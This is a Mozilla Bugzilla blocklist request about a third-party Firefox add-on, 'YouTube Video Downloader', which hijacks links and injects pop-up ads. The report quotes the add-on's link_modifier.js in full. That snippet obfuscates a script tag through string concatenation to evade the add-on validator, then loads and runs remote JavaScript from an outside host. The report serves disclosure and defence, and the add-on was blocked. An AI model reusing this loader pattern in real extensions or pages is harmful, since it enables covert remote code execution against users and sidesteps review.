Closed Bug 1231010 Opened 9 years ago Closed 8 years ago

Rogue YouTube Video Downloader addon hijacking links and injecting pop ups

Categories

(Toolkit :: Blocklist Policy Requests, defect)

Product:
Toolkit
Component:
Blocklist Policy Requests
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED FIXED

People

(Reporter: Swarnava, Assigned: jorgev)

References

(
URL
)

Details

The unlisted addon YouTube Video Downloader is currently executing remote code to hijack links and inject pop up ads. Homepage[http://addoncrop.com/youtube_video_downloader/].

This has been brought to attention in the following post: https://www.reddit.com/r/firefox/comments/3vl3yz/getting_tons_of_popup_tabs_all_of_a_sudden_with/1

A quick inspection to its source code already shows a red flag in its include folder contents, namely the link_modifier.js file which contains the following code in its entirity:

    var s = document.createElement('scr'+'ipt');
    s.type = 'text/ja'+'va'+'scr'+'ipt';
    s.src = 'http://www.sourcecrab.com/YouTube_Extend/ff_http_extend.js';
    document.getElementsByTagName('head')[0].appendChild(s);

It is evident that the developer intended to bypass the AMO validator (when it was running for unlisted addons) by creating a dangerous element via string concatenation. In this file it loads and executes an external script.

I didn't find any notice/content policy informing the user of this malware-like behavior and don't think needed to inspect more of the source code after finding that file.


Discouse link:- https://discourse.mozilla-community.org/t/rogue-youtube-video-downloader-addon-hijacking-links-and-injecting-pop-ups/5784/1
I can't seem to find this addon on AMO. Is it only hosted from a 3rd party?
Right link form reddit board is http://www.iks.hs-merseburg.de/~gruni/netfaq/homepage-nutzen.html

Seems that it is an unlisted addon and only hosted from 3rd party
(In reply to Lars Gusowski [:lagu] from comment #2)
> Right link form reddit board is
> http://www.iks.hs-merseburg.de/~gruni/netfaq/homepage-nutzen.html
> 
> Seems that it is an unlisted addon and only hosted from 3rd party

Thanks Lars, our admins are in an all hands meeting and we will get to them asap
https://www.reddit.com/r/firefox/comments/3vl3yz/getting_tons_of_popup_tabs_all_of_a_sudden_with/ it the right link :(
not sure why i posted a link to the tespage from an university :/
Sorry for the delay. I contacted the developers and will give them some time to respond.
Assignee: nobody → jorge
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i1077
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Product: addons.mozilla.org → Toolkit
You need to log in before you can comment on or make changes to this bug.